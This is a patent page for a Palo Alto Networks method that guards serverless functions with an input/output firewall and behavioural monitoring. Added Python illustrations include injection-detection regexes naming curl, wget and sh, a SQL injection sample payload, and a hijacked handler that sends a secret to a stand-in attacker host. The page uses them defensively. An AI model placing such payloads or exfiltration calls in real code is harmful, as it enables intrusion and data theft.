Protecting serverless applications

US12328329B2 · US · B2

Patent metadata
Publication number: US-12328329-B2
Application number: US-202418602353-A
Country: US
Kind code: B2
Filing date: Mar 12, 2024
Priority date: Apr 4, 2018
Publication date: Jun 10, 2025
Grant date: Jun 10, 2025


Abstract

Official abstract text for this publication.

A system and methods for protecting a serverless application, the system including: (a) a serverless application firewall configured to inspect input of the serverless function so as to ascertain whether the input contains malicious, suspicious or abnormal data; and (b) a behavioral protection engine configured to monitor behaviors and actions of the serverless functions during execution thereof.
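The serverless application firewall of component (a), together with the output check of claim 1 and the event normalization and normal input profile of claims 6 to 10, written out as an added example. This is not Palo Alto Networks' code and is not taken from the patent: it assumes an AWS Lambda-style event from an API-Gateway-like source, and the field names, the three injection signatures, the leak signatures, the max-plus-three-standard-deviations length ceiling and the sample traffic are all constructed for illustration.

```python
import base64
import re
import statistics

# Constructed application-layer signatures (claim 8); a real ruleset is far larger.
UNSAFE_PATTERNS = [
    re.compile(r"(?i)\bunion\b.+\bselect\b|'\s*or\s+'?1'?\s*=\s*'?1"),  # SQL injection
    re.compile(r"<\s*script\b", re.I),                                  # script injection
    re.compile(r"[;|&]\s*(?:rm|cat|curl|wget|sh)\b"),                   # command injection
]
# Data that must not leave the function in its output: constructed shapes for an
# AWS access key id, a PEM private key and a leaked Python stack trace.
LEAK_PATTERNS = [re.compile(r"\bAKIA[0-9A-Z]{16}\b"), re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
                 re.compile(r"Traceback \(most recent call last\)")]
# Fields the function never reads, keyed by event source (the "event context" of
# claim 6). Assumed values for an API-Gateway-style source.
IRRELEVANT_FIELDS = {"apigw": {"requestContext", "multiValueHeaders"}}
FORMATS = {"digits": r"\d+", "alpha": r"[A-Za-z]+", "email": r"[\w.+-]+@[\w-]+(\.[\w-]+)+"}

def normalize_event(event, event_context):
    """Clear irrelevant fields and decode a base64 body (claims 6 and 7) so the
    inspection sees exactly the data the function will see."""
    event = dict(event)
    for field in IRRELEVANT_FIELDS.get(event_context.get("source", ""), ()):
        event.pop(field, None)
    if event.get("isBase64Encoded") and isinstance(event.get("body"), str):
        event["body"] = base64.b64decode(event["body"]).decode("utf-8", "replace")
        event["isBase64Encoded"] = False
    return event

def _scalars(value, path=""):
    """Yield (dotted path, string value) for every leaf of a nested event."""
    if isinstance(value, dict):
        for k, v in value.items():
            yield from _scalars(v, f"{path}.{k}" if path else str(k))
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from _scalars(v, f"{path}[{i}]")
    else:
        yield path, "" if value is None else str(value)

def _format_of(s):
    """Coarse format class, one of the input attributes of claim 10."""
    return next((name for name, rx in FORMATS.items() if re.fullmatch(rx, s)), "mixed")

def learn_input_profile(clean_events):
    """Normal input profile from inputs already judged safe (claim 9): per field,
    the formats seen and a length ceiling of max + 3 standard deviations."""
    lengths, formats = {}, {}
    for ev in clean_events:
        for path, s in _scalars(ev):
            lengths.setdefault(path, []).append(len(s))
            formats.setdefault(path, set()).add(_format_of(s))
    return {path: {"formats": formats[path],
                   "max_len": max(ls) + 3 * (statistics.pstdev(ls) if len(ls) > 1 else 0.0)}
            for path, ls in lengths.items()}

def inspect_input(event, profile):
    """Application-layer checks plus profile conformance; [] means no unsafe data."""
    findings = []
    for path, s in _scalars(event):
        findings += [f"{path}: matches {p.pattern!r}" for p in UNSAFE_PATTERNS if p.search(s)]
        known = profile.get(path)
        if known is None:
            findings.append(f"{path}: field absent from every clean input")
        elif len(s) > known["max_len"]:
            findings.append(f"{path}: length {len(s)} exceeds ceiling {known['max_len']:.0f}")
        elif _format_of(s) not in known["formats"]:
            findings.append(f"{path}: format {_format_of(s)!r} never seen for this field")
    return findings

def inspect_output(output):
    """Output-side check of claim 1: flag secrets or tracebacks in the response."""
    return [f"{path}: matches {p.pattern!r}" for path, s in _scalars(output)
            for p in LEAK_PATTERNS if p.search(s)]

def firewall_check(raw_event, event_context, profile):
    """Normalize, then inspect: what runs before the function instance may execute."""
    return inspect_input(normalize_event(raw_event, event_context), profile)

# Constructed traffic: twenty clean historical events, two hostile events, one leaky response.
CONTEXT = {"source": "apigw"}
CLEAN_EVENTS = [{"path": "/users", "queryStringParameters": {"id": str(n), "email": f"user{n}@example.com"},
                 "body": None, "isBase64Encoded": False, "requestContext": {"requestId": f"r{n}"}}
                for n in range(1, 21)]
PROFILE = learn_input_profile(normalize_event(e, CONTEXT) for e in CLEAN_EVENTS)
SQLI_EVENT = {"path": "/users", "queryStringParameters": {"id": "7", "email": "a@example.com"},
              "body": base64.b64encode(b"id=1' OR 1=1 --").decode(), "isBase64Encoded": True}
OVERSIZED_EVENT = {"path": "/users", "queryStringParameters": {"id": "9" * 400, "email": "b@example.com"},
                   "body": None, "isBase64Encoded": False}
LEAKY_RESPONSE = {"statusCode": 500, "body": "Traceback (most recent call last):\n  File ...",
                  "debug": {"key": "AKIAIOSFODNN7EXAMPLE"}}  # AWS's documented example key id
```

Two points the claims leave implicit and the code makes concrete: inspection runs on the normalized event, so a base64-encoded body cannot carry a payload past the signatures, and the profile is built only from inputs already judged safe (claim 9), which limits how far hostile traffic can shift the length ceiling. The profile check is deliberately strict about fields it has never seen; in production that strictness is tuned per event source.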

First claim

Opening claim text (preview).

The invention claimed is:

1. A method comprising: protecting a serverless application that uses a serverless function with protection logic that inspects, within a runtime environment of the serverless function, inputs to the serverless function and outputs from the serverless function, wherein protecting the serverless application comprises, inspecting event data to be input to a first instance of the serverless function and event context based on detection of an event that triggers the serverless function; allowing the first instance of the serverless function to execute with input of the event data if determined to not include unsafe data; determining whether behavior of the first instance of the serverless function conforms to normal behavior for the serverless function learned from observations of historical instances of the serverless function; inspecting output of the first instance of the serverless function to determine whether the output contains unsafe data; and raising a security action if the event data or the output is determined to contain unsafe data or if the behavior of the first instance of the serverless function does not conform to the normal behavior.

2. The method of claim 1 further comprising inserting sensors into at least one of the runtime environment and the serverless function, wherein the sensors collect execution data corresponding to behavior.

3. The method of claim 2, wherein inserting the sensors comprises one of embedding the sensors in the serverless function, wrapping the serverless function with wrapper code, and dynamic hooking.

4. The method of claim 1 further comprising wrapping the serverless function with wrapper code that implements the protection logic.

5. The method of claim 1 further comprising instantiating in the runtime environment software that implements the protection logic.

6. The method of claim 1, wherein protecting the serverless application further comprises determining which of the event data is irrelevant to execution of the serverless function based on the event context and clearing the irrelevant data prior to inspecting the event data.

7. The method of claim 1, wherein protecting the serverless application further comprises determining a field in the event data is encoded and decoding the field prior to inspecting the event data.

8. The method of claim 1, wherein inspecting the event data comprises performing application layer checks on the event data.

9. The method of claim 1, wherein inspecting the event data comprises determining whether the event data conforms to a normal input profile built based on statistical analysis of previous inputs determined to not contain unsafe data across different instance of the serverless function.

10. The method of claim 9, wherein the normal input profile indicates a set of input attributes that at least include format and size/length.

11. The method of claim 1, further comprising learning the normal behavior, wherein learning the normal behavior comprises collecting samples of behavior of the historical instances and clustering the samples, wherein determining whether behavior of the first instance of the serverless function conforms to the normal behavior comprises classifying the behavior of the first instance of the serverless function based on the clustering.

12. The method of claim 1 further comprising learning the normal behavior from the observations of historical instances of the serverless function, wherein the observations correspond to at least one of external data sources accessed by the historical instances, sequences of operations or interactions performed by the historical instances, and which operations or interactions are performed when accessing an external resource.

13. The method of claim 1 further comprising generating a policy based on the learned normal behavior and enforcing the policy, wherein enforcing the policy comprises determining whether behavior of the first instance of the serverless function conforms to the policy.

14. A non-transitory, machine-readable medium having program code stored thereon, the program code comprising instructions to: load an application firewall into a runtime environment of a serverless function based, at least in part, on detection of an event that triggers the serverless function; inspect, with the application firewall, event data to be input to a first instance of the serverless function and event context; allow the first instance of the serverless function to execute with input of the event data if determined to not include unsafe data; determine whether behavior of the first instance of the serverless function conforms to normal behavior for the serverless function learned from observations of historical instances of the serverless function; inspect output of the first instance of the serverless function to determine whether the output contains unsafe data; and raise a security action if the event data or the output is determined to contain unsafe data or if the behavior of the first instance of the serverless function does not conform to the normal behavior.

15. The non-transitory, machine-readable medium of claim 14, wherein the program code further comprises instructions to insert sensors into at least one of the runtime environment and the serverless function, wherein the sensors collect execution data corresponding to behavior.

16. The non-transitory, machine-readable medium of claim 14, wherein the program code further comprises instructions to also load into the runtime environment the instructions to determine whether behavior of the first instance of the serverless function conforms to learned normal behavior and the instructions to inspect output.

17. The non-transitory, machine-readable medium of claim 14, wherein the program code further comprises instructions to determine which of the event data is irrelevant to execution of the serverless function based on the event context and to clear the irrelevant data prior to inspection of the event data and/or instructions to determine whether the event data includes an encoded field and to decode an encoded field.

18. The non-transitory, machine-readable medium of claim 14, wherein the instructions to inspect the event data comprise instructions to determine whether the event data conforms to a normal input profile built based on statistical analysis of previous inputs determined to not contain unsafe data across different instances of the serverless function, wherein the normal input profile indicates a set of input attributes that at least include format and size/length.

19. The non-transitory, machine-readable medium of claim 14, wherein the program code further comprises instructions to learn the normal behavior, wherein the instructions to learn the normal behavior comprise instructions to collect samples of behavior of the historical instances and cluster the samples, wherein the instructions to determine whether behavior of the first instance of the serverless function conforms to the normal behavior comprise instructions to classify the behavior of the first instance of the serverless function based on the clustering, wherein the observations correspond to at least one of external data sources accessed by the historical instances, sequences of operations or interactions performed by the historical instances, and which operations or interactions are performed when accessing an external resource.

20. The non-transitory, machine-readable medium of claim 14, wherein the program c
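The behavioral protection engine of component (b), as an added illustration that is not Palo Alto Networks' code and not taken from the patent. A dynamic hook around a client object plays the sensor of claims 2 and 3; per-run feature sets and a leader clustering stand in for the learning of claims 11 and 12 (the patent names no clustering algorithm, so this is the simplest one that shows the idea); the wrapper of claim 4 enforces a policy derived from the learned clusters (claim 13) while the function runs and classifies the full trace afterwards. The Lambda-style (event, context) signature, FakeClient, the three handlers, the thresholds and all other names are constructed for this example; input and output inspection are left out of this wrapper.

```python
import functools

class SecurityAction(Exception):
    """The security action of claim 1: here, block the invocation and report why."""

class Sensor:
    """Dynamic hook (claim 3) recording each client call as (operation, resource), i.e. the
    resources touched and their order (claim 12); with a policy set, an unknown call is refused."""
    def __init__(self):
        self.trace, self.policy = [], None

    def hook(self, client, methods):
        for name in methods:
            original = getattr(client, name)
            @functools.wraps(original)
            def recorded(*args, _orig=original, _name=name, **kw):
                call = (_name, args[0] if args else None)
                if self.policy is not None and call not in self.policy:
                    raise SecurityAction(f"policy violation: {call} never seen in normal behaviour")
                self.trace.append(call)
                return _orig(*args, **kw)
            setattr(client, name, recorded)

def _features(trace):
    """Behaviour sample: the (op, resource) pairs plus ordered operation bigrams."""
    ops = [op for op, _ in trace]
    return set(trace) | {("seq", a, b) for a, b in zip(ops, ops[1:])}

def _jaccard(a, b):
    return len(a & b) / len(a | b) if a or b else 1.0

def learn_normal_behavior(samples, threshold=0.6, min_members=3):
    """Leader clustering (claim 11): a sample joins the first cluster whose leader it
    resembles, else founds one; small clusters are dropped so one odd run is not 'normal'."""
    clusters = []
    for s in map(_features, samples):
        for c in clusters:
            if _jaccard(s, c["leader"]) >= threshold:
                c["members"] += 1
                break
        else:
            clusters.append({"leader": s, "members": 1})
    return [c["leader"] for c in clusters if c["members"] >= min_members]

def classify(trace, normal, threshold=0.6):
    """Return (conforms, similarity to the closest learned cluster)."""
    best = max((_jaccard(_features(trace), c) for c in normal), default=0.0)
    return best >= threshold, best

def protect(handler, sensor, normal):
    """Wrapper code carrying the protection logic (claim 4). The sensor is hooked once per
    container and reused across warm invocations; only the trace is reset per call."""
    sensor.policy = {f for c in normal for f in c if f[0] != "seq"}  # policy from learned behaviour
    @functools.wraps(handler)
    def wrapped(event, context):
        sensor.trace.clear()
        result = handler(event, context)
        conforms, score = classify(sensor.trace, normal)
        if not conforms:
            raise SecurityAction(f"behaviour deviates from normal (similarity {score:.2f}): {sensor.trace}")
        return result
    return wrapped

class FakeClient:  # constructed stand-in for a storage/HTTP client
    store = {"orders": {"42": {"id": "42", "total": 9.5}}, "secrets": {"db": "hunter2"}}
    def get(self, table, key): return self.store.get(table, {}).get(key)
    def put(self, table, key, value): self.store.setdefault(table, {})[key] = value
    def send(self, url, payload): return 200

client, sensor = FakeClient(), Sensor()
sensor.hook(client, ["get", "put", "send"])

def order_handler(event, context):       # normal: read the order, write an audit row
    order = client.get("orders", event["id"])
    client.put("audit", event["id"], "read")
    return {"order": order}

def exfil_handler(event, context):       # hijacked: read secrets, post them out
    client.send("https://attacker.example/collect", client.get("secrets", "db"))
    return {"order": None}

def skip_audit_handler(event, context):  # permitted calls only, but not the normal sequence
    return {"order": client.get("orders", event["id"]), "again": client.get("orders", event["id"])}

HISTORY = []
for _ in range(10):                      # observe historical instances of the normal handler
    sensor.trace.clear()
    order_handler({"id": "42"}, {})
    HISTORY.append(list(sensor.trace))
NORMAL = learn_normal_behavior(HISTORY)

def run_protected(handler, event):       # (result, None), or (None, reason) if a security action fired
    try:
        return protect(handler, sensor, NORMAL)(event, {}), None
    except SecurityAction as exc:
        return None, str(exc)
```

The two failure modes are caught at different points on purpose: the exfiltration is refused inside the sensor before the secrets table is read, because ("get", "secrets") is outside the learned policy, whereas the handler that skips the audit write uses only permitted calls and is only caught by the post-run classification, since its operation sequence matches no cluster. A pairwise allowlist alone would miss the second case.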

Assignees

Palo Alto Networks Inc
Inventors

Classifications

  • Event detection, e.g. attack signature detection · CPC title

  • Firewall traversal, e.g. tunnelling or, creating pinholes · CPC title

  • Traffic logging, e.g. anomaly detection · CPC title

Patent family

Related publications grouped by family.

External sources

Frequently asked questions

Answers are generated from the same data shown on this page.

What does patent US12328329B2 cover?
A system and methods for protecting a serverless application, the system including: (a) a serverless application firewall configured to inspect input of the serverless function so as to ascertain whether the input contains malicious, suspicious or abnormal data; and (b) a behavioral protection engine configured to monitor behaviors and actions of the serverless functions during execution thereof.
Who is the assignee on this patent?
Palo Alto Networks Inc
What technology area does this patent fall under?
Primary CPC classification H04L63/1425 (traffic logging, e.g. anomaly detection). Mapped technology areas include Electricity (CPC section H).
When was this patent published?
Publication date Jun 10, 2025 (kind code B2). Legal status and post-grant events are not shown on this page.
What related patents are in patentsdb?
We list 4 related publications on this page (citations in our corpus or others sharing the same primary CPC).